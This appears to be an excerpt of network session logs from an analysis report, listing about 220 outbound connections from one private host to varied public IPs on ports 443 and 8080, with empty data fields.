                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9768192.168.2.1455346113.87.160.31443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9769192.168.2.145914037.86.201.41443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9770192.168.2.1446584180.40.143.251443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9771192.168.2.1454156118.240.4.151443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9772192.168.2.145005894.48.151.188443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9773192.168.2.1443458167.34.176.228443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9774192.168.2.1455532163.204.40.59443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9775192.168.2.1460350128.128.218.219443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9776192.168.2.1460694107.236.202.2443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9777192.168.2.1437334167.60.254.167443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9778192.168.2.143504896.233.213.168443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9779192.168.2.144206653.4.247.231443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9780192.168.2.1443780118.32.111.106443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9781192.168.2.143551263.251.118.42443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9782192.168.2.1434374171.195.0.214443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9783192.168.2.143320818.44.180.17443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9784192.168.2.1444736134.192.159.159443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9785192.168.2.146024284.52.155.187443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9786192.168.2.144429042.244.167.201443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9787192.168.2.1460832124.54.98.164443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9788192.168.2.1439964106.132.76.62443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9789192.168.2.1460820117.158.87.161443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9790192.168.2.1435554172.13.97.218443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9791192.168.2.145850481.233.109.31443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9792192.168.2.14343981.64.18.121443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9793192.168.2.1453928106.162.172.54443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9794192.168.2.1433128118.20.44.230443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9795192.168.2.143724848.40.193.83443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9796192.168.2.1459512186.195.240.181443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9797192.168.2.1442376102.51.237.110443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9798192.168.2.1460234122.194.174.191443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9799192.168.2.144492268.107.141.226443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9800192.168.2.14361985.61.120.234443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9801192.168.2.1449654140.188.30.254443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9802192.168.2.1450896102.97.76.17443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9803192.168.2.145954823.207.95.88443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9804192.168.2.1438202162.23.48.134443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9805192.168.2.1454916139.143.210.131443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9806192.168.2.143906013.15.6.13443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9807192.168.2.1450552216.194.18.211443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9808192.168.2.143283672.227.65.9443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9809192.168.2.14517261.186.213.246443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9810192.168.2.143464412.45.21.221443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9811192.168.2.144992664.31.27.31443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9812192.168.2.1454832103.234.47.34443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9813192.168.2.1449414113.199.119.187443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9814192.168.2.146099696.180.24.30443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9815192.168.2.1460524106.120.61.156443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9816192.168.2.1451076141.105.25.70443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9817192.168.2.1448196114.205.255.88443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9818192.168.2.14519101.8.194.23443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9819192.168.2.143355491.29.91.131443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9820192.168.2.1446032135.221.77.19443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9821192.168.2.1457200200.123.71.27443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9822192.168.2.144509451.99.185.43443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9823192.168.2.1444742148.11.56.219443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9824192.168.2.1452460181.143.65.102443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9825192.168.2.144551664.148.156.175443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9826192.168.2.145985467.39.240.172443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9827192.168.2.1454574165.246.79.32443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9828192.168.2.145646048.64.160.33443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9829192.168.2.143860497.79.148.68443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9830192.168.2.1447670144.49.106.1468080
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9831192.168.2.1457360176.147.15.2438080
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9832192.168.2.144748289.249.201.888080
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9833192.168.2.14603562.112.129.28080
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9834192.168.2.1456752137.251.208.168443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9835192.168.2.145365223.112.47.84443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9836192.168.2.143710852.152.40.34443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9837192.168.2.1445812159.38.226.18443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9838192.168.2.1438546139.127.61.244443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9839192.168.2.144221637.234.125.15443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9840192.168.2.144384699.220.28.155443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9841192.168.2.145472432.68.52.28443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9842192.168.2.1454696182.87.169.205443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9843192.168.2.1457658220.219.169.37443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9844192.168.2.1433420133.136.105.198443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9845192.168.2.145658496.67.56.172443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9846192.168.2.145598274.90.13.63443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9847192.168.2.1438314129.177.148.177443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9848192.168.2.145057282.65.103.245443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9849192.168.2.1440374185.212.2.43443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9850192.168.2.144232248.170.187.70443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9851192.168.2.1456910158.109.70.156443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9852192.168.2.1449500175.46.196.188443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9853192.168.2.1433518142.126.39.6443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9854192.168.2.1438456114.205.84.97443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9855192.168.2.145378290.157.125.62443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9856192.168.2.144641462.95.173.60443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9857192.168.2.14525202.195.3.115443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9858192.168.2.144610425.204.49.56443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9859192.168.2.1433396133.83.228.24443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9860192.168.2.1444216174.90.204.158443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9861192.168.2.1459020155.199.4.95443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9862192.168.2.1442734179.235.212.144443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9863192.168.2.1447920182.195.232.115443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9864192.168.2.1446636193.171.86.15443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9865192.168.2.144953643.153.149.72443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9866192.168.2.143416467.8.178.252443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9867192.168.2.1439758134.151.60.211443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9868192.168.2.1437664204.243.159.165443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9869192.168.2.143963834.244.63.222443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9870192.168.2.1448468130.229.34.22443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9871192.168.2.145371618.249.0.12443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9872192.168.2.1459074208.117.181.250443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9873192.168.2.144228285.139.12.134443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9874192.168.2.143883887.12.245.28443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9875192.168.2.145106634.217.55.92443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9876192.168.2.1449322120.236.212.11443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9877192.168.2.1452766114.159.40.74443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9878192.168.2.146077873.115.241.214443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9879192.168.2.143941079.202.89.183443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9880192.168.2.1443878143.176.180.162443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9881192.168.2.145281086.70.178.66443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9882192.168.2.144562446.183.56.174443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9883192.168.2.144450417.97.160.1443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9884192.168.2.143333213.89.125.65443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9885192.168.2.143349840.38.112.164443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9886192.168.2.1447240138.148.98.145443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9887192.168.2.144745473.3.205.233443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9888192.168.2.1456716160.49.37.194443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9889192.168.2.144370061.139.107.60443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9890192.168.2.1455916145.120.146.199443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9891192.168.2.144736088.186.159.64443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9892192.168.2.144397470.17.49.254443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9893192.168.2.14533969.126.124.178443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9894192.168.2.1438480207.181.2.110443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9895192.168.2.1459376147.141.59.12443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9896192.168.2.1433762116.23.251.161443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9897192.168.2.1449090135.139.66.194443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9898192.168.2.1451452111.19.2.126443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9899192.168.2.1459806100.129.164.190443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9900192.168.2.1449360143.205.146.8443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9901192.168.2.1449434198.138.120.212443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9902192.168.2.143782818.28.23.160443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9903192.168.2.1435100103.193.86.104443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9904192.168.2.145198064.43.246.252443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9905192.168.2.1457746114.218.247.24443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9906192.168.2.143512642.135.67.123443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9907192.168.2.144099042.32.154.93443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9908192.168.2.1445104197.249.81.158443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9909192.168.2.1439390198.232.244.250443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9910192.168.2.1456544108.253.157.155443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9911192.168.2.144519447.218.17.170443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9912192.168.2.1460954169.251.10.198443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9913192.168.2.1450146208.26.253.201443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9914192.168.2.1435744146.213.191.177443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9915192.168.2.143277074.237.16.193443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9916192.168.2.1441460123.86.171.197443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9917192.168.2.144112635.18.0.106443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9918192.168.2.1453938129.69.79.103443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9919192.168.2.1437066168.164.203.201443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9920192.168.2.1437426126.243.88.37443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9921192.168.2.144703444.223.116.85443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9922192.168.2.143617620.194.175.227443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9923192.168.2.1446904131.13.239.214443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9924192.168.2.144368475.126.151.246443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9925192.168.2.1458910178.37.92.231443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9926192.168.2.145388832.233.133.52443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9927192.168.2.1439620131.39.155.81443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9928192.168.2.144344247.218.220.146443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9929192.168.2.1455650144.105.167.15443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9930192.168.2.1452888154.52.99.95443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9931192.168.2.1435598157.181.166.160443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9932192.168.2.1460338181.208.120.252443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9933192.168.2.1432786117.92.251.239443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9934192.168.2.145385863.161.250.171443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9935192.168.2.1458020221.78.148.160443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9936192.168.2.1449386153.25.19.48443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9937192.168.2.143675472.165.225.191443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9938192.168.2.14512282.208.37.236443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9939192.168.2.145520889.201.187.158443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9940192.168.2.14495925.198.198.176443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9941192.168.2.1438214156.209.243.82443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9942192.168.2.146014027.192.238.40443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9943192.168.2.143658085.252.234.139443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9944192.168.2.1446212190.27.179.182443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9945192.168.2.1443492217.57.224.42443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9946192.168.2.1457684100.16.152.88443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9947192.168.2.143555413.179.217.176443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9948192.168.2.1458444164.132.121.106443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9949192.168.2.1459648179.158.213.86443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9950192.168.2.144842674.74.233.179443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9951192.168.2.1452880125.246.248.213443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9952192.168.2.1458852102.129.180.83443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9953192.168.2.144999283.91.34.210443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9954192.168.2.1433660217.192.6.255443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9955192.168.2.144213437.255.166.149443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9956192.168.2.1459016147.46.62.219443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9957192.168.2.143861250.223.224.170443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9958192.168.2.1440910213.195.5.14443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9959192.168.2.1446574186.167.12.182443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9960192.168.2.1454318147.136.142.198443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9961192.168.2.145055476.86.220.5443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9962192.168.2.1442988194.148.2.97443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9963192.168.2.1442786178.232.209.234443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9964192.168.2.145253648.254.103.71443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9965192.168.2.143833014.127.131.160443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9966192.168.2.143697293.24.186.139443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9967192.168.2.145991627.189.60.66443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9968192.168.2.143541849.27.203.103443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9969192.168.2.1453308185.245.27.255443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9970192.168.2.145353024.239.3.32443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9971192.168.2.145834897.184.176.115443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9972192.168.2.1440268112.230.245.73443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9973192.168.2.144458064.242.248.221443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9974192.168.2.1457174134.44.118.192443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9975192.168.2.145367677.178.30.24443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9976192.168.2.1438160115.59.210.101443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9977192.168.2.1456504133.226.251.251443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9978192.168.2.144304074.248.38.12443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9979192.168.2.1439082159.192.247.173443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9980192.168.2.145945423.37.82.131443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9981192.168.2.145746078.188.101.156443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9982192.168.2.1448008192.38.57.92443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9983192.168.2.1460142195.142.81.28443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9984192.168.2.143735412.103.192.31443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9985192.168.2.1458712119.98.30.73443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9986192.168.2.1454688134.225.216.91443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9987192.168.2.144660687.150.115.95443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9988192.168.2.144748814.75.247.167443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9989192.168.2.1449178116.162.187.65443
                                              TimestampBytes transferredDirectionData


